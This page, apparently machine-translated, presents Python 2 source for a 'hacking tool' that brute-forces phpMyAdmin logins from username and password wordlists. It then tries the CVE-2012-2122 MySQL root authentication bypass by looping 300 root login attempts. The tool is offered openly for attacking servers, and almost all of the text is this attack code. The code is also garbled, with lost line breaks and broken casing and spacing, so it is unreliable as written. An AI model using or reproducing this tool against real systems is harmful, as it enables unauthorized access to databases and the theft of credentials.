Python writes phpMyAdmin brute Force hacking tool code _python

phpMyAdmin brute force cracking, plus cve-2012-2122 MySQL authentication Bypass vulnerability exploit.

#!/usr/bin/env python import urllib import urllib2 import cookielib import sys import subprocess def crack (Url,usernam E,password): opener = Urllib2.build_opener (urllib2. Httpcookieprocessor (Cookielib. Lwpcookiejar ()) headers = {' user-agent ': ' mozilla/5.0 (Windows NT 6.1; WOW64) '} params = Urllib.urlencode ({' Pma_username ': username, ' Pma_password ': password}) request = Urllib2. Request (url+ "/index.php", params,headers) response = Opener.open (Request) A=response.read () If A.find (' Database serve R ')!=-1 and A.find (' name= ' Login_form "') ==-1:return username,password return 0 def mysqlauthenticationbypasscheck (host , port): I=0 while I<300:i=i+1 subprocess. Popen ("MySQL--host=%s-p%s-uroot-piswin"% (Host,port), shell=true). Wait () if __name__ = = ' __main__ ': If Len (SYS.ARGV) <4:print "#author: Iswin\n#useage python pma.py http://www.jb51.net/phpmyadmin/username.txt password.txt" Sys.exit () print "Bruting,pleas wait ..." for name in open (Sys.argv[2], "R"): FOR PASSW in open (Sys.argv[3], "R"): State=crack (SYS.ARGV[1],NAME,PASSW) if State!=0:print "\nbrute successful" Print "UserName: +state[0]+" PassWord: "+state[1] Sys.exit () print" Sorry,brute failed...,try to use mysqlauthentic Ationbypasscheck "choice=raw_input (' warning:this function needs MySQL environment.\ny:try to Mysqlauthenticationbypasscheck\nothers:exit\n ') if choice== ' y ' or choice== ' y ': host=raw_input (' Host: ') Port=raw_inpu
 T (' Port: ') Mysqlauthenticationbypasscheck (Host,port)